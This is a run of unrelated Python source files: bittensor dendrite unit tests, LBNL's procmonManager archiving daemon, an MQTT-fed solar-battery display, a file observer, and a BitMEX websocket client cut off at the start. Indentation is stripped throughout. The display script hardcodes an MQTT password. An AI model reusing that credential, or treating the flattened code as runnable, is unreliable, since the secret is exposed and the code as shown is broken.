def _set_pin(self, pin: str, value: int) -> None:
"""Sets given pin to value.
Args:
pin: The pin name or number.
value: The value to set the pin to (e.g., 0 or 1).
"""
cmd = self._get_command(self._os).format(pin, value)
out, err = self._communicate(cmd)
if err and len(err) > 0:
self.logger.error(f'Setting GPIO pin "{pin}" to "{value}" failed: '
f'{err}')
else:
self.logger.verbose(f'Set GPIO pin "{pin}" to "{value}"')
def handle_gpio(self,
header: Dict[str, Any],
payload: Dict[str, Any]) -> None:
"""Puts message payload in the queue.
Args:
header: The message header.
payload: The message payload.
"""
self._queue.put(payload)
def run(self) -> None:
"""Waits for new messages and sets GPIO pin to high or low."""
while self.is_running:
# Blocking I/O.
message = self._queue.get()
value = message.get('value', self._default_state)
if value in [0, 1, "0", "1"]:
self._set_pin(self._pin, value)
time.sleep(self._duration)
self._set_pin(self._pin, self._default_state)
def start(self) -> None:
if self._is_running:
return
super().start()
self._thread = threading.Thread(target=self.run)
self._thread.daemon = True
self._thread.start()
|
test_forward_backward.py
|
from sys import version
from bittensor._endpoint import endpoint
import bittensor
import torch
import pytest
from unittest.mock import MagicMock
from torch.autograd import Variable
import multiprocessing
import time
dendrite = bittensor.dendrite()
dendrite.receptor_pool.forward = MagicMock(return_value = [torch.tensor([]), [1], [0]])
dendrite.receptor_pool.backward = MagicMock(return_value = [torch.tensor([]), [1], [0]])
endpoint = bittensor.endpoint(
version = bittensor.__version_as_int__,
uid = 0,
hotkey = '',
ip = '0.0.0.0',
ip_type = 4,
port = 8080,
modality = 0,
coldkey = ''
)
def test_dendrite_forward_tensor_shape_error():
x = torch.rand(3, 3, 3)
with pytest.raises(ValueError):
dendrite.forward_tensor( endpoints=[endpoint], inputs=[x])
def test_dendrite_forward_image_shape_error():
x = torch.rand(3, 3, 3)
with pytest.raises(ValueError):
dendrite.forward_image( endpoints=[endpoint], inputs=[x])
def test_dendrite_forward_text_shape_error():
x = torch.rand(3, 3, 3)
with pytest.raises(ValueError):
dendrite.forward_image( endpoints=[endpoint], inputs=[x])
def test_dendrite_forward_text():
x = torch.tensor([[1,2,3,4],[5,6,7,8]], dtype=torch.long)
dendrite.receptor_pool.forward = MagicMock(return_value = [ [torch.zeros([2, 4, bittensor.__network_dim__])], [1], [0]])
tensors, codes, times = dendrite.forward_text( endpoints=[endpoint], inputs=[x])
assert codes[0].item() == bittensor.proto.ReturnCode.Success
assert list(tensors[0].shape) == [2, 4, bittensor.__network_dim__]
def test_dendrite_forward_image():
x = torch.tensor([ [ [ [ [ 1 ] ] ] ] ], dtype=torch.float32)
dendrite.receptor_pool.forward = MagicMock(return_value = [ [torch.zeros([1, 1, bittensor.__network_dim__])] , [1], [0]])
tensors, codes, times = dendrite.forward_image( endpoints=[endpoint], inputs=[x])
assert codes[0].item() == bittensor.proto.ReturnCode.Success
assert list(tensors[0].shape) == [1, 1, bittensor.__network_dim__]
def test_dendrite_forward_tensor():
x = torch.rand(3, 3, bittensor.__network_dim__, dtype=torch.float32)
dendrite.receptor_pool.forward = MagicMock(return_value = [ [torch.zeros([3, 3, bittensor.__network_dim__])], [1], [0]])
tensors, codes, times = dendrite.forward_tensor( endpoints=[endpoint], inputs=[x])
assert codes[0].item() == bittensor.proto.ReturnCode.Success
assert list(tensors[0].shape) == [3, 3, bittensor.__network_dim__]
def test_dendrite_forward_tensor_pass_through_text():
x = torch.ones((3, 3), dtype=torch.int64)
y = torch.zeros([3, 3, bittensor.__network_dim__])
dendrite.receptor_pool.forward = MagicMock(return_value = [ [y, y, y] , [1, 1, 1], [0,0,0]])
tensors, codes, times = dendrite.forward_text( endpoints=[endpoint, endpoint, endpoint], inputs=[x, x, x])
assert codes[0].item() == bittensor.proto.ReturnCode.Success
assert codes[1].item() == bittensor.proto.ReturnCode.Success
assert codes[2].item() == bittensor.proto.ReturnCode.Success
assert tensors[0].shape == y.shape
assert tensors[1].shape == y.shape
assert tensors[2].shape == y.shape
def test_dendrite_forward_tensor_pass_through_image():
x = torch.rand(3, 3, 3, 3, 3)
y = torch.zeros([3, 3, bittensor.__network_dim__])
dendrite.receptor_pool.forward = MagicMock(return_value = [ [y, y, y] , [1, 1, 1], [0,0,0]])
tensors, codes, times = dendrite.forward_image( endpoints=[endpoint, endpoint, endpoint], inputs=[x, x, x])
assert codes[0].item() == bittensor.proto.ReturnCode.Success
assert codes[1].item() == bittensor.proto.ReturnCode.Success
assert codes[2].item() == bittensor.proto.ReturnCode.Success
assert tensors[0].shape == y.shape
assert tensors[1].shape == y.shape
assert tensors[2].shape == y.shape
def test_dendrite_forward_tensor_pass_through_tensor():
x = torch.rand(3, 3, bittensor.__network_dim__)
y = torch.zeros([3, 3, bittensor.__network_dim__])
dendrite.receptor_pool.forward = MagicMock(return_value = [ [y, y, y] , [1, 1, 1], [0,0,0]])
tensors, codes, times = dendrite.forward_tensor( endpoints = [endpoint, endpoint, endpoint], inputs=[x, x, x])
assert codes[0].item() == bittensor.proto.ReturnCode.Success
assert codes[1].item() == bittensor.proto.ReturnCode.Success
assert codes[2].item() == bittensor.proto.ReturnCode.Success
assert tensors[0].shape == y.shape
assert tensors[1].shape == y.shape
assert tensors[2].shape == y.shape
def test_dendrite_forward_tensor_stack():
x = torch.rand(3, 3, bittensor.__network_dim__)
y = torch.zeros([3, 3, bittensor.__network_dim__])
dendrite.receptor_pool.forward = MagicMock(return_value = [ [y, y, y] , [1, 1, 1], [0,0,0]])
tensors, codes, times = dendrite.forward_tensor( endpoints = [endpoint, endpoint, endpoint], inputs = [x, x, x])
stacked = torch.stack(tensors, dim=2)
assert stacked.shape == torch.zeros([3, 3, 3, bittensor.__network_dim__ ]).shape
averaged = torch.mean(stacked, dim=2)
assert averaged.shape == torch.zeros([3, 3, bittensor.__network_dim__ ]).shape
def test_dendrite_backward():
x = Variable(torch.rand((1, 1, bittensor.__network_dim__), dtype=torch.float32), requires_grad=True)
y = torch.ones((1, 1, bittensor.__network_dim__))
dendrite.receptor_pool.forward = MagicMock(return_value = [ [y], [0], [0]])
dendrite.receptor_pool.backward = MagicMock(return_value = [ [y], [0], [0]])
tensors, codes, times = dendrite.forward_tensor( endpoints = [ endpoint ], inputs=[ x ])
tensors[0].sum().backward()
assert x.grad.shape == y.shape
def test_dendrite_backward_large():
x = Variable(torch.rand((1, 1, bittensor.__network_dim__), dtype=torch.float32), requires_grad=True)
y = torch.ones((1, 1, bittensor.__network_dim__))
dendrite.receptor_pool.forward = MagicMock(return_value = [ [y], [0], [0]])
dendrite.receptor_pool.backward = MagicMock(return_value = [ [y], [0], [0]])
tensors, codes, times = dendrite.forward_tensor( endpoints = [ endpoint ], inputs=[ x ])
tensors[0].sum().backward()
assert x.grad.shape == y.shape
assert x.grad.tolist() == y.tolist()
def test_dendrite_backward_multiple():
x1 = Variable(torch.rand((1, 1, bittensor.__network_dim__), dtype=torch.float32), requires_grad=True)
x2 = Variable(torch.rand((1, 1, bittensor.__network_dim__), dtype=torch.float32), requires_grad=True)
x3 = Variable(torch.rand((1, 1, bittensor.__network_dim__), dtype=torch.float32), requires_grad=True)
y1 = torch.ones(1, 1, bittensor.__network_dim__)
y2 = torch.ones(1, 1, bittensor.__network_dim__)
y3 = torch.ones(1, 1, bittensor.__network_dim__)
dendrite.receptor_pool.forward = MagicMock(return_value = [ [y1, y2, y3], [1,1,1], [0,0,0]])
dendrite.receptor_pool.backward = MagicMock(return_value = [ [y1, y2, y3], [1,1,1], [0,0,0]])
tensors, codes, times = dendrite.forward_tensor( endpoints = [endpoint, endpoint, endpoint], inputs=[ x1, x2, x3 ])
tensors[0].sum().backward()
assert x1.grad.shape == y1.shape
assert x2.grad.shape == y2.shape
assert x3.grad.shape == y3.shape
assert x1.grad.tolist() == y1.tolist()
assert x2.grad.tolist() == y2.tolist()
assert x3.grad.tolist() == y3.tolist()
# def test_multiprocessing_forward():
# dendrite = bittensor.dendrite()
# dendrite.receptor_pool.forward = MagicMock(return_value = [torch.tensor([]), [0]])
# dendrite.receptor_pool.backward = MagicMock(return_value = [torch.tensor([]), [0]])
# endpoint = bittensor.endpoint(
# uid = 0,
# hotkey = '',
# ip = '0.0.0.0',
# ip_type = 4,
# port = 8080,
# modality = 0,
# coldkey = ''
# )
# def call_forwad_multiple_times( object ):
# for _ in range(5):
# x = torch.rand(3, 3, bittensor.__network_dim__)
# y = torch.zeros([3, 3, bittensor.__network_dim__])
# dendrite.receptor_pool.forward = MagicMock(return_value = [ [y, y, y] , [0, 0, 0]])
# tensors, codes, times = dendrite.forward_tensor( endpoints = [ endpoint, endpoint, endpoint], inputs = [x, x, x] )
# p1 = multiprocessing.Process(target=call_forwad_multiple_times, args=(dendrite,))
# p2 = multiprocessing.Process(target=call_forwad_multiple_times, args=(dendrite,))
# p1.start()
# p2.start()
# p1.join()
# p2.join()
if __name__ == "__main__":
test_dendrite_backward_multiple()
#test_dendrite_backward_large()
|
procmonManager.py
|
################################################################################
# procmon, Copyright (c) 2014, The Regents of the University of California,
# through Lawrence Berkeley National Laboratory (subject to receipt of any
# required approvals from the U.S. Dept. of Energy). All rights reserved.
#
# If you have questions about your rights to use or distribute this software,
# please contact Berkeley Lab's Technology Transfer Department at TTD@lbl.gov.
#
# The LICENSE file in the root directory of the source code archive describes
# the licensing and distribution rights and restrictions on this software.
#
# Author: Douglas Jacobsen <dmj@nersc.gov>
################################################################################
#!/usr/bin/env python
import os
import sys
import subprocess
from datetime import datetime, timedelta
import time
import socket
import threading
import json
import traceback
import errno
import re
import shutil
import argparse
from ConfigParser import SafeConfigParser
import syslog
procmonInstallBase = ''
if 'PROCMON_DIR' in os.environ:
procmonInstallBase = os.environ['PROCMON_DIR']
def split_args(arg_str, splitRegex):
items = re.split(splitRegex, arg_str)
ret_items = []
for item in items:
item = item.strip()
if len(item) > 0:
ret_items.append(item)
return ret_items
def split_path(arg_str):
return split_args(arg_str, '[:\n]')
def is_True(arg_str):
return arg_str == "True"
def split_comma(arg_str):
return split_args(arg_str, '[,\s\n]')
def send_email(config, subject, message):
if not config.use_email:
return
import smtplib
message = """From: %s
To: %s
Subject: MESSAGE FROM PROCMON: %s
%s
""" % (config.email_originator, ", ".join(config.email_list), subject, message)
try:
smtp_message = smtplib.SMTP('localhost')
smtp_message.sendmail(config.email_originator, config.email_list, message)
except smtplib.SMTPException:
syslog.syslog(LOG_ERR, "Error: failed to send email!")
def get_exception():
exc_type, exc_value, exc_traceback = sys.exc_info()
str_exc = traceback.format_exc()
str_tb = '\n'.join(traceback.format_tb(exc_traceback))
str_stack2 = '' #'\n'.join(traceback.format_stack())
s = '%s\n%s\n%s\n' % (str_exc, str_tb, str_stack2)
s = filter(lambda x: x != '\u0000', s)
return s.decode('unicode_escape').encode('ascii','ignore')
def start_procMuxer(config, group=None, id=None, prefix=None, pidfile=None):
args = [config.procMuxerPath, '-c', '60', '-d']
if prefix is not None:
args.extend(['-O',prefix])
if group is not None:
args.extend(['-g',group])
if id is not None:
args.extend(['-i',str(id)])
if pidfile is not None:
args.extend(['-p',pidfile])
syslog.syslog("starting proxmuxer with args: %s" % ' '.join(args))
return subprocess.call(args, stdin=None, stdout=None, stderr=None)
def get_muxer_pid(config, muxer_id):
pidfilename = "%s/%s/%d" % (config.base_pid_path, config.group, muxer_id)
current_pid = None
if os.path.exists(pidfilename):
try:
fd = open(pidfilename, 'r')
for line in fd:
current_pid = int(line.strip())
except:
pass
return current_pid
def is_muxer_running(config, muxer_id):
current_pid = get_muxer_pid(config, muxer_id)
if type(current_pid) is int:
procfile = "/proc/%d/status" % current_pid
return os.path.exists(procfile)
return False
def get_current_files(config, muxer_id):
current_pid = get_muxer_pid(config, muxer_id)
files = []
if type(current_pid) is int:
for fdnum in xrange(3,10):
fdpath = "/proc/%d/fd/%d" % (current_pid, fdnum)
if os.path.exists(fdpath):
filename = os.readlink(fdpath)
if re.search('%s.*procMuxer\.%d' % (config.group, muxer_id), filename):
files.append(filename)
else:
break
return files
def mkdir_p(path):
try:
os.makedirs(path, 0755)
except OSError as e:
if e.errno == errno.EEXIST and os.path.isdir(path): pass
else: raise
def archive_hpss(config, fname, ftype, sources = None, doNothing=False):
(somepath,core_fname) = os.path.split(fname)
with config.hpss_lock:
newpath = "%s/%s/archiving/%s" % (config.base_prefix, config.group, core_fname)
try:
shutil.copy2(fname, newpath);
os.chmod(newpath, 0444)
except:
except_string = get_exception()
syslog.syslog(LOG_ERR, "failed to copy file to archival dir: %s; %s; %s" % (fname, newpath, except_string))
send_email(config, "failed to copy file to archival dir", "%s\n%s\n%s\n" % (f, newpath, except_string))
return 1
prodfileRegex = re.compile('%s\.(\d+)\.h5' % config.h5_prefix)
for a_fname in os.listdir("%s/%s/archiving" % (config.base_prefix, config.group)):
match = prodfileRegex.match(a_fname)
hpssPath = "%s/other" % config.h5_prefix
if match is not None:
file_dt = datetime.strptime(match.group(1), "%Y%m%d%H%M%S")
hpssPath = "%s/%04d/%02d" % (config.h5_prefix, int(file_dt.year), int(file_dt.month))
cmd=["hsi","put -P -d %s/%s/archiving/%s : %s/%s" % (config.base_prefix, config.group, a_fname, hpssPath, a_fname)]
retval = subprocess.call(cmd)
if retval == 0:
syslog.syslog(syslog.LOG_INFO, "successfully archived %s to %s/%s" % (a_fname, hpssPath, a_fname))
else:
syslog.syslog(syslog.LOG_ERR, "failed to archive %s, %d" % (a_fname, retval))
send_email(config, "failed to archive", "%s, %d" % (a_fname, retval))
def register_jamo(config, fname, ftype, sources = None, doNothing=False):
md_final = None
tape_archival = [1]
local_purge_days = 180
if ftype == "procmon_badrecords_h5":
tape_archival = []
local_purge_days = 7
if ftype == "procmon_stripe_h5":
tape_archival = []
local_purge_days = 7
if ftype == "procmon_reduced_h5":
tape_archival = [1]
local_purge_days = 180
if ftype == 'procmon_summary_h5':
tape_archival = [1]
local_purge_days = 180
retval = subprocess.call(['/bin/setfacl', '-m', 'user:%s:rw-' % config.jamo_user, fname])
if retval != 0:
syslog.syslog(syslog.LOG_ERR, "failed to set acl on %s" % fname)
send_email(config, "failed to set acl", fname)
return None
md_proc = subprocess.Popen([config.metadata_path, '-i', fname], stdout=subprocess.PIPE)
(stdout, stderr) = md_proc.communicate()
if md_proc.returncode == 0:
metadata = json.loads(stdout)
if 'recording_start' in metadata:
tmp_dt = datetime.fromtimestamp(int(metadata['recording_start']))
metadata['recording_start'] = tmp_dt.strftime("%Y-%m-%dT%H:%M:%S.%f")
if 'recording_stop' in metadata:
tmp_dt = datetime.fromtimestamp(int(metadata['recording_stop']))
metadata['recording_stop'] = tmp_dt.strftime("%Y-%m-%dT%H:%M:%S.%f")
del metadata['hosts']
if sources is not None:
metadata['source'] = {'metadata_id': sources}
md_final = {}
md_final['procmon'] = metadata
else:
syslog.syslog(syslog.LOG_ERR, "failed to read file stats: %s" % fname)
send_email(config, "failed to read file stats", fname)
return None
posted = None
if sources is None:
sources = []
if doNothing:
return None
with config.sdm_lock:
posted = config.sdm.post('api/metadata/file',
file=fname,
file_type=ftype,
local_purge_days=local_purge_days,
backup_services=tape_archival,
inputs=sources,
metadata=md_final,
)
if posted is None or 'metadata_id' not in posted:
syslog.syslog(syslog.LOG_ERR, "failed to register with jamo: %s; %s" % (fname, ftype, ))
send_email(config, "failed to register with jamo", "%s\n%s\n" % (fname, ftype, ))
return posted
def reduce_files_wrapper(config, timeobj, filenames):
try:
reduce_files(config, timeobj, filenames)
except:
except_string = get_exception()
syslog.syslog(syslog.LOG_ERR, "reducer thread failure: %s" % except_string)
send_email(config, "reducer thread failure: %s" % except_string)
def reduce_files(config, timeobj, filenames):
"""Runs the reducer on the files. Then moves files to final destination,
sets proper permissions, then registers the files with JAMO"""
product_output = "%s/%s/processing/%s.%s.h5" % (config.base_prefix, config.group, config.h5_prefix, timeobj.strftime("%Y%m%d%H%M%S"))
bad_output = "%s/%s/processing/bad_%s.%s.h5" % (config.base_prefix, config.group, config.h5_prefix, timeobj.strftime("%Y%m%d%H%M%S"))
reducer_args = [config.reducer_path, '-o', product_output, '-b', bad_output]
for f in filenames:
reducer_args.extend(['-i', f])
retval = subprocess.call(reducer_args, stdin=None, stdout=None, stderr=None)
if retval != 0:
syslog.syslog(syslog.LOG_ERR, "reducer failed! retcode: %d; cmd: %s" % (retval, " ".join(reducer_args)))
send_email(config, "reducer failed!", "retcode: %d\ncmd: %s" % (retval, " ".join(reducer_args)))
return 1
(currpath, product_fname) = os.path.split(product_output)
(currpath, bad_fname) = os.path.split(bad_output)
final_product = '%s/%s' % (config.h5_path, product_fname)
final_badoutput = '%s/%s' % (config.target_scratch, bad_fname)
sources = []
for f in filenames:
(somepath,fname) = os.path.split(f)
newpath = "%s/%s" % (config.target_scratch, fname)
try:
syslog.syslog(syslog.LOG_ERR, "about to move %s to %s " % (f, newpath))
shutil.move(f, newpath);
syslog.syslog(syslog.LOG_ERR, "about to chmod %s " % (newpath))
os.chmod(newpath, 0444)
except:
except_string = get_exception()
syslog.syslog(syslog.LOG_ERR, "reducer failed to move file: %s; %s; %s\n" % (f, newpath, except_string))
send_email(config, "reducer failed to move file", "%s\n%s\n%s\n" % (f, newpath, except_string))
return 1
if config.use_jamo:
response = register_jamo(config, newpath, "procmon_stripe_h5")
if 'metadata_id' in response:
sources.append(response['metadata_id'])
if config.use_hpss:
archive_hpss(config, product_output, "procmon_reduced_h5", sources)
try:
shutil.move(product_output, final_product)
os.chmod(final_product, 0444)
except:
except_string = get_exception()
syslog.syslog(syslog.LOG_ERR, "reducer failed to move file: %s; %s; %s\n" % (f, newpath, except_string))
send_email(config, "reducer failed to move file", "%s\n%s\n%s\n" % (product_output, final_product, except_string))
return 1
if config.use_jamo:
register_jamo(config, final_product, "procmon_reduced_h5", sources)
try:
shutil.move(bad_output, final_badoutput)
os.chmod(final_badoutput, 0444)
except:
except_string = get_exception()
syslog.syslog(syslog.LOG_ERR, "reducer failed to move file: %s; %s; %s\n" % (f, newpath, except_string))
send_email(config, "reducer failed to move file", "%s\n%s\n%s" % (bad_output, final_badoutput, except_string))
return 1
if config.use_jamo:
register_jamo(config, final_badoutput, "procmon_badrecords_h5", sources)
def main_loop(config):
# create pid directory
syslog.syslog(syslog.LOG_INFO, "procmonManager: attempting to create directory %s/%s" % (config.base_pid_path, config.group))
mkdir_p("%s/%s" % (config.base_pid_path, config.group))
# create working directory
mkdir_p("%s/%s" % (config.base_prefix, config.group))
mkdir_p("%s/%s/processing" % (config.base_prefix, config.group))
mkdir_p("%s/%s/collecting" % (config.base_prefix, config.group))
mkdir_p("%s/%s/archiving" % (config.base_prefix, config.group))
os.chdir("%s/%s" % (config.base_prefix, config.group))
file_prefix = "%s/%s/collecting/procMuxer" % (config.base_prefix, config.group)
last_rotation = None
syslog.syslog(syslog.LOG_WARNING, "starting management of %s ProcMuxer group on %s" % (config.group, socket.gethostname()))
send_email(config, "%s starting" % config.group, "starting management of %s ProcMuxer group on %s" % (config.group, socket.gethostname()))
## enter into perpetual loop
reduce_threads = {}
while True:
## check if the muxers are running, if not, restart them
for muxer_id in xrange(config.num_procmuxers):
if not is_muxer_running(config, muxer_id):
start_procMuxer(config, group=config.group, id=muxer_id,
prefix="%s.%d" % (file_prefix, muxer_id),
pidfile="%s/%s/%d" % (config.base_pid_path, config.group, muxer_id)
)
## if more than an hour has elapsed since the last successful
## rotation of log files, then check
if (not last_rotation) or ((datetime.now() - last_rotation).total_seconds() > 3600):
## get list of currently open files
open_filenames = []
for muxer_id in xrange(config.num_procmuxers):
files = get_current_files(config, muxer_id)
for f in files:
(path,fname) = os.path.split(f)
if fname: open_filenames.append(fname)
## get list of files in collecting, filter out current files and non-targets
## put into candidate_files
files = os.listdir('%s/%s/collecting' % (config.base_prefix, config.group))
open_files = []
candidate_files = []
for f in files:
fmatch = re.match('procMuxer\.(\d+)\.(\d+).h5', f)
if not fmatch: continue
muxer = fmatch.group(1)
file_dt = datetime.strptime(fmatch.group(2), "%Y%m%d%H%M%S")
file_dt = datetime(file_dt.year, file_dt.month, file_dt.day, file_dt.hour)
if f not in open_filenames:
candidate_files.append( (f,file_dt,) )
else:
open_files.append( (f, file_dt,) )
# put any files from candidate list which have same hour as a file in open list
# into the final_candidate_files hash
premature_files = []
final_candidate_files = {}
for (cf,cf_dt) in candidate_files:
matched = False
for (of, of_dt) in open_files:
if of_dt == cf_dt: matched = True
if not matched:
if cf_dt not in final_candidate_files:
final_candidate_files[cf_dt] = []
final_candidate_files[cf_dt].append(cf)
else:
premature_files.append( (cf, cf_dt,) )
# get list of file times in order
times = sorted(final_candidate_files.keys())
for fc_time in times:
## move the files
processing_files = []
for fname in final_candidate_files[fc_time]:
old_filename = "%s/%s/collecting/%s" % (config.base_prefix, config.group, fname)
new_filename = "%s/%s/processing/%s" % (config.base_prefix, config.group, fname)
os.rename(old_filename, new_filename)
processing_files.append(new_filename)
## create a thread to manage the reduction of the files
reduce_thread = threading.Thread(target=reduce_files_wrapper, args=(config, fc_time, processing_files,))
reduce_thread.start()
#reduce_threads[fc_time] = reduce_thread
last_rotation = fc_time
time.sleep(20)
def read_configuration(args):
global procmonInstallBase
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('-f', '--config', help="Specify configuration file instead of default at $PROCMON_DIR/etc/procmonManager.conf", default='%s/etc/procmonManager.conf' % procmonInstallBase, metavar="FILE")
args, remaining_args = parser.parse_known_args()
defaults = {
"group": "procman_prod",
"num_procmuxers": 2,
"procMuxerPath": "%s/sbin/ProcMuxer" % procmonInstallBase,
"reducer_path": "%s/sbin/PostReducer" % procmonInstallBase,
"metadata_path": "%s/sbin/CheckH5" % procmonInstallBase,
"base_pid_path": "/tmp/pid",
"base_prefix": "/tmp",
"h5_path": "%s/var/procmon" % procmonInstallBase,
"h5_prefix": "procmon",
"daemonize": False,
"target_scratch": None,
"email_list": None,
"email_originator": None,
"use_email": False,
"use_jamo": False,
"use_hpss": False,
"jamo_url": None,
"jamo_token": None,
"jamo_user": None,
"logfacility": "local4",
}
if args.config and os.path.exists(args.config):
config = SafeConfigParser()
config.read([args.config])
new_defaults = dict(config.items("procmonManager"))
for key in new_defaults:
if key in defaults:
defaults[key] = new_defaults[key]
parser = argparse.ArgumentParser(parents=[parser])
parser.set_defaults(**defaults)
parser.add_argument("--num_procmuxers", help="Number of procMuxers (listeners) to run", type=int)
parser.add_argument("--group", help="Management group of muxers", type=str)
parser.add_argument("--procMuxerPath", help="Path to ProcMuxer", type=str)
parser.add_argument("--reducer_path", help="Path to PostReducer", type=str)
parser.add_argument("--metadata_path", help="Path to CheckH5", type=str)
parser.add_argument("--base_pid_path", help="Directory for pidfiles", type=str)
parser.add_argument("--base_prefix", help="Local storage for data collection and processing", type=str)
parser.add_argument("--h5_path", help="Search path for h5 files", type=str)
parser.add_argument("--h5_prefix", help="Prefix for h5 file names (e.g., h5-path/<prefix>.YYYYMmddhHMMSS.h5)")
parser.add_argument("--target_scratch", help="Path for scratch products", type=str)
parser.add_argument("--email_list", help="Comma seperated list of people to email about procmonManager", type=split_comma)
parser.add_argument("--email_originator", help="'From' email address", type=str)
parser.add_argument("--use_jamo", help="Use Jamo (or Not)", type=is_True)
parser.add_argument("--jamo_url", help="URL for JAMO", type=str)
parser.add_argument("--jamo_token", help="Token for JAMO", type=str)
parser.add_argument("--jamo_user", help="username for jamo user", type=str)
parser.add_argument("--use_email", help="Use Email for warnings/errors (or Not)", type=is_True)
parser.add_argument("--daemonize", help="Daemonize the manager process", type=is_True)
parser.add_argument("--use_hpss", help="Use HPSS (or Not)", type=is_True)
parser.add_argument("--logfacility", help="syslog facility to use", type=str)
args, remaining_args = parser.parse_known_args(remaining_args)
return (args, remaining_args)
def daemonize():
pid = None
sid = None
if os.getppid() == 1:
# already daemonized
return
pid = os.fork()
if pid < 0:
sys.stderr.write("Failed to fork! Bailing out.\n");
sys.exit(1)
elif pid > 0:
# this is the parent, exit out
sys.exit(0)
os.umask(022)
os.chdir("/")
os.setsid()
pid = os.fork()
if pid > 0:
sys.exit(0)
devnull = open(os.devnull, "rw")
for fd in (sys.stdin, sys.stdout, sys.stderr):
fd.close()
fd = devnull
if __name__ == "__main__":
(config,remaining_args) = read_configuration(sys.argv[1:])
print config
if config.use_jamo:
import sdm_curl
config.sdm = sdm_curl.Curl(config.jamo_url, appToken=config.jamo_token)
config.sdm_lock = threading.Lock()
if config.use_hpss:
config.hpss_lock = threading.Lock()
logFacility = syslog.LOG_LOCAL4
if config.logfacility is not None:
logFacility = config.logfacility.strip()
try:
logFacility = re.search('([\d\w]+)', logFacility).group(0)
logFacility = eval("syslog.LOG_%s" % logFacility)
except:
logFacility = syslog.LOG_LOCAL4
pass
syslog.openlog(logoption=syslog.LOG_PID, facility=logFacility)
if config.daemonize:
daemonize()
try:
main_loop(config)
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
str_exc = traceback.format_exc()
str_tb = '\n'.join(traceback.format_tb(exc_traceback))
str_stack2 = '\n'.join(traceback.format_stack())
send_email(config, 'PROCMON FAILURE', '%s\n%s\n%s\n' % (str_exc, str_tb, str_stack2))
syslog.syslog(syslog.LOG_ERR, "PROCMONMANAGER FAILURE: stopped managing, %s" % str_exc)
|
pvDisplayPi0SimpleGUI.py
|
# pv display for Pi0 using python3 and PySimpleGUI
import time
from time import ctime
from datetime import datetime
import pytz
import json
import paho.mqtt.client as mqtt
import threading
Vin = ' 00.0'
Vout = ' 00.0'
Iin = ' 00.00'
Iout = ' 00.00'
ptz = pytz.timezone('America/Los_Angeles')
utc = pytz.timezone('UTC')
now = utc.localize(datetime.utcnow())
Time = str(now.astimezone(ptz))[:-13]
import PySimpleGUI as sg
sg.theme('DarkAmber') # Add a little color to your windows
sg.set_options(font=('Helvetica', 14))
# All the stuff inside your window. This is the PSG magic code compactor...
layout = [ [sg.Text(Time, key='-time-')],
[sg.Text('Battery In V: '), sg.Text(Vin, key='-Vin-'),
sg.Text(' I: '), sg.Text(Iin, key='-Iin-')],
[sg.Text('Battery Out V: '), sg.Text(Vout, key='-Vout-'),
sg.Text(' I: '), sg.Text(Iout, key='-Iout-')]
]
# Create the Window
window = sg.Window('PV Monitor', layout, no_titlebar=True)
def new_measurement(client, userdata, msg):
topic = msg.topic
measurement = json.loads(msg.payload)
#print(topic, measurement)
now = utc.localize(datetime.utcnow())
Time = str(now.astimezone(ptz))[:-13]
window['-time-'].update(Time)
if 'output' in topic:
if 'current' in topic:
Iout = " {0:5.2f}".format(measurement)
window['-Iout-'].update(Iout)
print(Iout)
else:
Vout = " {0:5.2f}".format(measurement)
window['-Vout-'].update(Vout)
elif 'input' in topic:
if 'current' in topic:
Iin = " {0:5.2f}".format(measurement)
window['-Iin-'].update(Iin)
else:
Vin = " {0:5.2f}".format(measurement)
window['-Vin-'].update(Vin)
# start mqtt client
def on_connect(client, userdata, flags, rc):
if rc == 0:
print("MQTT connect success")
else:
print(f"MQTT connect fail with code {rc}")
print("New MQT session being set up")
client = mqtt.Client()
client.on_connect = on_connect
client.on_message = new_measurement
client.username_pw_set(username='mosq', password='1947nw')
client.connect("192.168.1.117", 1883, 60)
client.subscribe('pv/battery/output/voltage')
client.subscribe("pv/battery/output/current")
client.subscribe('pv/battery/input/voltage')
client.subscribe("pv/battery/input/current")
def PSGEvents():
while True:
event, values = window.read()
if event in (sg.WIN_CLOSED, 'Cancel'):
break
window.close()
def MQTT_Msgs():
while True:
client.loop()
time.sleep(1)
t1 = threading.Thread(target=PSGEvents)
t2 = threading.Thread(target=MQTT_Msgs)
t1.start()
t2.start()
|
fileobserver.py
|
import os
import glob
import time
import threading
import berrymq
class FileObserver(object):
def __init__(self, target_dir, id_name, interval=5):
self.id_name = id_name
self.target_dir = target_dir
self.interval = interval
self.fileinfo = self._get_fileinfo()
self.thread = threading.Thread(target=self._checkdir)
self.thread.setDaemon(True)
self.running = True
self.thread.start()
def stop(self):
self.running = False
def _checkdir(self):
while self.running:
time.sleep(self.interval)
new_info = self._get_fileinfo()
old_info = self.fileinfo
newfiles = set(new_info.keys())
oldfiles = set(old_info.keys())
for created_file in (newfiles - oldfiles):
berrymq.twitter("%s:created" % self.id_name, created_file)
for remove_file in (oldfiles - newfiles):
berrymq.twitter("%s:removed" % self.id_name, remove_file)
for remain_file in (oldfiles & newfiles):
if new_info[remain_file] != old_info[remain_file]:
berrymq.twitter("%s:modified" % self.id_name, remain_file)
self.fileinfo = new_info
def _get_fileinfo(self):
result = {}
for filename in glob.glob(self.target_dir):
result[filename] = os.path.getmtime(filename)
return result
|
bitmex_websocket.py
|
# coding: UTF-8
import hashlib
import hmac
import json
import os
import threading
import time
import traceback
import urllib
import websocket
from datetime import datetime, timedelta
from src import logger, to_data_frame, notify
from src.config import config as conf
def generate_nonce():
return int(round(time.time() * 1000))
def generate_signature(secret, verb, url, nonce, data):
"""Generate a request signature compatible with BitMEX."""
# Parse the url so we can remove the base and extract just the path.
parsedURL = urllib.parse.urlparse(url)
path = parsedURL.path
if parsedURL.query:
path = path + '?' + parsedURL.query
# print "Computing HMAC: %s" % verb + path + str(nonce) + data
message = (verb + path + str(nonce) + data).encode('utf-8')
signature = hmac.new(secret.encode('utf-8'), message, digestmod=hashlib.sha256).hexdigest()
return signature
class BitMexWs:
def __init__(self, account, pair, test=False):
"""
constructor
"""
# Account
self.account = account
# Pair
self.pair = pair
# condition that the bot runs on.
self.is_running = True
# testnet
self.testnet = test
# Notification destination listener
self.handlers = {}
if test:
domain = 'testnet.bitmex.com'
else:
domain = 'www.bitmex.com'
self.endpoint = 'wss://' + domain + '/realtime?subscribe=tradeBin1m:' + self.pair + ',' \
'tradeBin5m:' + self.pair + ',tradeBin1h:' + self.pair + ',tradeBin1d:' + self.pair + ',instrument:' + self.pair + ',' \
